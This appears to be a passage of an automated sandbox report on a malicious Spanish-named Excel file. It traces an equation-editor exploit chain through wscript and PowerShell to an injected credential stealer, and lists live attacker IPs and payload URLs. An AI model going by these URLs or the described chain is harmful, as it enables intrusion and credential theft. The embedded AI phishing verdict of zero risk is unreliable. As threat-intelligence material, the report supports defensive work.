                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3000, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.478863572.0000000002545000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3000, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1652, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.powershell.exe.3aa4df8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2200, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 3000, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information21
                  Scripting
                  Valid Accounts231
                  Windows Management Instrumentation
                  21
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  23
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  311
                  Process Injection
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  34
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts43
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)1
                  Obfuscated Files or Information
                  Security Account Manager531
                  Security Software Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts211
                  Command and Scripting Interpreter
                  Login HookLogin Hook1
                  Install Root Certificate
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model1
                  Input Capture
                  13
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets261
                  Virtualization/Sandbox Evasion
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials1
                  Application Window Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Remote System Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc Filesystem1
                  System Network Configuration Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt261
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465900 Sample: orden de compra.xlam.xlsx Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 24 other signatures 2->49 9 EXCEL.EXE 6 9 2->9         started        process3 file4 31 C:\Users\user\...\~$orden de compra.xlam.xlsx, data 9->31 dropped 12 EQNEDT32.EXE 12 9->12         started        process5 dnsIp6 41 192.3.243.156, 49161, 49164, 49167 AS-COLOCROSSINGUS United States 12->41 33 C:\Users\user\AppData\...\portugalslovenia.js, Unicode 12->33 dropped 77 Office equation editor establishes network connection 12->77 79 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 12->79 17 wscript.exe 1 12->17         started        file7 signatures8 process9 dnsIp10 35 41.216.183.13, 49162, 80 AS40676US South Africa 17->35 51 System process connects to network (likely due to code injection or exploit) 17->51 53 Suspicious powershell command line found 17->53 55 Wscript starts Powershell (via cmd or directly) 17->55 57 4 other signatures 17->57 21 powershell.exe 12 5 17->21         started        signatures11 process12 dnsIp13 37 uploaddeimagens.com.br 188.114.96.3, 443, 49163, 49165 CLOUDFLARENETUS European Union 21->37 59 Installs new ROOT certificates 21->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 21->61 63 Writes to foreign memory regions 21->63 65 Injects a PE file into a foreign processes 21->65 25 AddInProcess32.exe 12 2 21->25         started        29 AddInProcess32.exe 2 21->29         started        signatures14 process15 dnsIp16 39 ip-api.com 208.95.112.1, 49166, 49168, 80 TUT-ASUS United States 25->39 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 25->67 69 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->69 71 Tries to steal Mail credentials (via file / registry access) 25->71 75 2 other signatures 25->75 73 Tries to harvest and steal browser information (history, passwords, etc) 29->73 signatures17

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  orden de compra.xlam.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  orden de compra.xlam.xlsx47%VirustotalBrowse
                  orden de compra.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  ip-api.com0%VirustotalBrowse
                  uploaddeimagens.com.br5%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://ip-api.com0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  http://192.3.243.156/portugalslovenia.jpega0%Avira URL Cloudsafe
                  http://192.3.243.156/portugalslovenia.jpegj0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Ama;0%Avira URL Cloudsafe
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtz0%Avira URL Cloudsafe
                  http://192.3.243.156/portugalslovenia.jpeg0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  http://192.3.243.156/ourTraditionalbase.txt0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612Ama;0%Avira URL Cloudsafe
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txt0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?17196076120%Avira URL Cloudsafe
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtC:0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                  http://www.w3.0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br0%Avira URL Cloudsafe
                  http://192.3.243.156/portugalslovenia.jpegr0%Avira URL Cloudsafe
                  http://go.microsoft.c0%Avira URL Cloudsafe
                  https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462350%Avira URL Cloudsafe
                  http://192.3.243.156/ourTraditionalbase.txt13%VirustotalBrowse
                  https://uploaddeimagens.com.br6%VirustotalBrowse
                  http://192.3.243.156/portugalslovenia.jpeguuC:0%Avira URL Cloudsafe
                  http://192.3.243.1560%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                  http://192.3.243.15611%VirustotalBrowse
                  https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462355%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ip-api.com
                  208.95.112.1
                  truetrueunknown
                  uploaddeimagens.com.br
                  188.114.96.3
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://192.3.243.156/portugalslovenia.jpegtrue
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.243.156/ourTraditionalbase.txttrue
                  • 13%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235true
                  • 5%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://ip-api.com/line/?fields=hostingfalse
                  • URL Reputation: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://192.3.243.156/portugalslovenia.jpegaEQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://account.dyn.com/powershell.exe, 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/server1.crl0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235Ama;powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.243.156/portugalslovenia.jpegjEQNEDT32.EXE, 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net03powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtzwscript.exe, 00000005.00000003.484540516.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484859196.00000000007A0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612Ama;powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtwscript.exe, 00000005.00000002.484789084.00000000001C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484687327.000000000075D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484826885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484692972.0000000000756000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.484826885.0000000000757000.00000004.00000020.00020000.00000000.sdmp, portugalslovenia[1].jpg.2.dr, portugalslovenia.js.2.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://uploaddeimagens.com.br/images/004/806/083/original/new_image.jpg?1719607612powershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://41.216.183.13/Users_API/BrainiacMAX/file_rkwgrfjw.g0i.txtC:wscript.exe, 00000005.00000002.484826885.0000000000773000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484735410.000000000075D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484751886.0000000000772000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.484687327.000000000075D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.w3.AddInProcess32.exe, 00000009.00000002.618799471.0000000002519000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://uploaddeimagens.com.brpowershell.exe, 00000006.00000002.479060921.000000000246A000.00000004.00000800.00020000.00000000.sdmptrue
                  • 6%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.481125469.0000000003359000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ip-api.comAddInProcess32.exe, 00000008.00000002.478863572.0000000002511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025CB000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.000000000251B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025AE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://192.3.243.156/portugalslovenia.jpegrEQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://go.microsoft.cpowershell.exe, 00000006.00000002.478435107.00000000005FC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.3.243.156/portugalslovenia.jpeguuC:EQNEDT32.EXE, 00000002.00000002.462891948.0000000000622000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.479060921.0000000002331000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.0000000002511000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.478863572.00000000025AE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.000000000251B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.618799471.00000000025AE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.482555686.0000000004FA0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://192.3.243.156powershell.exe, 00000006.00000002.479060921.00000000025B5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 11%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  208.95.112.1
                  ip-api.comUnited States
                  53334TUT-ASUStrue
                  188.114.96.3
                  uploaddeimagens.com.brEuropean Union
                  13335CLOUDFLARENETUSfalse
                  192.3.243.156
                  unknownUnited States
                  36352AS-COLOCROSSINGUStrue
                  41.216.183.13
                  unknownSouth Africa
                  40676AS40676UStrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1465900
                  Start date and time:2024-07-02 08:20:27 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 58s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:12
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:orden de compra.xlam.xlsx
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLSX@10/8@3/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 60
                  • Number of non-executed functions: 7
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  TimeTypeDescription
                  02:22:07API Interceptor56x Sleep call for process: EQNEDT32.EXE modified
                  02:22:10API Interceptor89x Sleep call for process: wscript.exe modified
                  02:22:11API Interceptor26x Sleep call for process: powershell.exe modified
                  02:22:15API Interceptor23x Sleep call for process: AddInProcess32.exe modified
                  InputOutput
                  URL: Office document Model: gpt-4o
                  ```json{  "riskscore": 0,  "reasons": "The provided screenshot is completely blank with no visible text, buttons, or links. Therefore, there is no evidence of any malicious content, sense of urgency, or impersonation of well-known brands. The document does not pose any phishing risk based on the provided image."}
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  208.95.112.1KWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                  • ip-api.com/line/?fields=hosting
                  ServerManager.exeGet hashmaliciousXWormBrowse
                  • ip-api.com/line/?fields=hosting
                  MicrosoftService.exeGet hashmaliciousXWormBrowse
                  • ip-api.com/line/?fields=hosting
                  F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • ip-api.com/line/?fields=hosting
                  x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                  • ip-api.com/line/?fields=hosting
